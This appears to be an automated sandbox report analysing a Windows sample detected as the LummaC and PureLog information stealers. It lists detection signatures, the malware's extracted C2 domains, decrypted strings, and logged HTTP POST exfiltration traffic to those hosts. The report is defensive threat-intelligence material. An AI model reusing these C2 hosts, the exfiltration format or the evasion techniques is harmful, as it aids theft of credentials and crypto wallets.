Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1584228
MD5:	e9f13d0b330a73ece569b6115d2ac4f0
SHA1:	ae46dcc7a771c7adf161ddd0f48b6b5b5f22bfda
SHA256:	9c4afe3e68312e44bbaa3f122a251bb087f72d94adf8d432bdd8382087086c92
Tags:	NETexeMSILuser-jstrosch
Infos:

Detection

LummaC, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E9F13D0B330A73ECE569B6115D2AC4F0)

conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

file.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E9F13D0B330A73ECE569B6115D2AC4F0)

WerFault.exe (PID: 7000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 160 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "noisycuttej.shop", "cloudewahsj.shop", "wholersorie.shop", "tirepublicerj.shop", "rabidcowse.shop", "framekgirus.shop", "nearycrepso.shop"], "Build id": "XpLY32--"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
file.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.file.exe.100000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.file.exe.34f9550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.file.exe.34f9550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T22:58:08.034243+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.64.1	443	TCP
2025-01-04T22:58:09.019156+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.64.1	443	TCP
2025-01-04T22:58:10.221347+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.64.1	443	TCP
2025-01-04T22:58:11.328741+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.64.1	443	TCP
2025-01-04T22:58:12.715275+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.64.1	443	TCP
2025-01-04T22:58:13.997441+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	104.21.64.1	443	TCP
2025-01-04T22:58:15.331970+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	104.21.64.1	443	TCP
2025-01-04T22:58:17.342354+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T22:58:08.548914+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49733	104.21.64.1	443	TCP
2025-01-04T22:58:09.491546+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49735	104.21.64.1	443	TCP
2025-01-04T22:58:17.803148+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49746	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T22:58:08.548914+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49733	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T22:58:09.491546+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49735	104.21.64.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T22:58:08.034243+0100	2058629	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.64.1	443	TCP
2025-01-04T22:58:09.019156+0100	2058629	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	104.21.64.1	443	TCP
2025-01-04T22:58:10.221347+0100	2058629	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	104.21.64.1	443	TCP
2025-01-04T22:58:11.328741+0100	2058629	1	Domain Observed Used for C2 Detected	192.168.2.4	49740	104.21.64.1	443	TCP
2025-01-04T22:58:12.715275+0100	2058629	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	104.21.64.1	443	TCP
2025-01-04T22:58:13.997441+0100	2058629	1	Domain Observed Used for C2 Detected	192.168.2.4	49744	104.21.64.1	443	TCP
2025-01-04T22:58:15.331970+0100	2058629	1	Domain Observed Used for C2 Detected	192.168.2.4	49745	104.21.64.1	443	TCP
2025-01-04T22:58:17.342354+0100	2058629	1	Domain Observed Used for C2 Detected	192.168.2.4	49746	104.21.64.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T22:58:07.459055+0100	2058628	1	Domain Observed Used for C2 Detected	192.168.2.4	50365	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T22:58:11.823080+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49740	104.21.64.1	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T22:58:15.336589+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49745	104.21.64.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://tirepublicerj.shop:443/apiCLSID	Avira URL Cloud: Label: malware
Source: https://tirepublicerj.shop/)	Avira URL Cloud: Label: malware
Source: https://tirepublicerj.shop/ndows	Avira URL Cloud: Label: malware
Source: https://tirepublicerj.shop/	Avira URL Cloud: Label: malware
Source: https://tirepublicerj.shop/api	Avira URL Cloud: Label: malware
Source: https://tirepublicerj.shop/9	Avira URL Cloud: Label: malware
Source: https://tirepublicerj.shop/api8	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.file.exe.34f9550.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "noisycuttej.shop", "cloudewahsj.shop", "wholersorie.shop", "tirepublicerj.shop", "rabidcowse.shop", "framekgirus.shop", "nearycrepso.shop"], "Build id": "XpLY32--"}

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 39%
Source: file.exe	Virustotal: Detection: 43%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 90.5% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: XpLY32--

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00415D89 CryptUnprotectData,

2_2_00415D89

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: System.pdb) source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: file.exe, WEREBF6.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: Handler.pdbt-^q source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WEREBF6.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]	2_2_00441816
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, esi	2_2_0043D0D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]	2_2_0043D0D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]	2_2_0040C080
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, word ptr [eax]	2_2_004442E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_00418BA2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh	2_2_00444C20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edx	2_2_00430F03
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_0042F716
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]	2_2_00417054
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]	2_2_0041B021
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_0041B021
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	2_2_004438E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	2_2_004438F9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	2_2_004438FB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]	2_2_00422880
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, bx	2_2_00427885
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	2_2_0041F170
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-2Ch], eax	2_2_004421E9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi+10h], 00000000h	2_2_004421E9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esi]	2_2_0041618C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	2_2_0041BA52
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov esi, ecx	2_2_0041BA52
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0041BA52
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	2_2_00402210
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0043A230
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00431AF5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]	2_2_0040B280
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	2_2_00440A90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]	2_2_00441B50
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_00409360
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00422370
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_0042FB7D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	2_2_00408320
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_00419B30
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0041F3E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_0041B3F2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	2_2_0041AB90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	2_2_00428C62
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	2_2_00427C10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]	2_2_00414C30
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	2_2_00418492
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, word ptr [ebx]	2_2_0043CD40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0042C5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_0041B58F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_004195B6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_004195B6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, edx	2_2_0043E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, word ptr [edx]	2_2_0043E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edx	2_2_00430F4E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edx	2_2_00430F54
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ebx], ax	2_2_0041A770
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]	2_2_00427FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]	2_2_00427FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	2_2_004437D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	2_2_0042A7F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	2_2_0042A7F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	2_2_00427FFD
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	2_2_0042AF92
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0042AF92
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	2_2_0042AFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.4:50365 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49742 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49740 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49737 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49745 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49744 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49746 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49735 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49745 -> 104.21.64.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop

Source: Joe Sandbox View

IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tirepublicerj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: tirepublicerj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0BJTZMSTNMF6ZWXQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18146Host: tirepublicerj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UILB0NA6RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8725Host: tirepublicerj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0HSGNRLJRUP0IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: tirepublicerj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y50MEZKPLS8CSHAPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 976Host: tirepublicerj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GB16ICI9CGD0FDQ47JLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550376Host: tirepublicerj.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: tirepublicerj.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

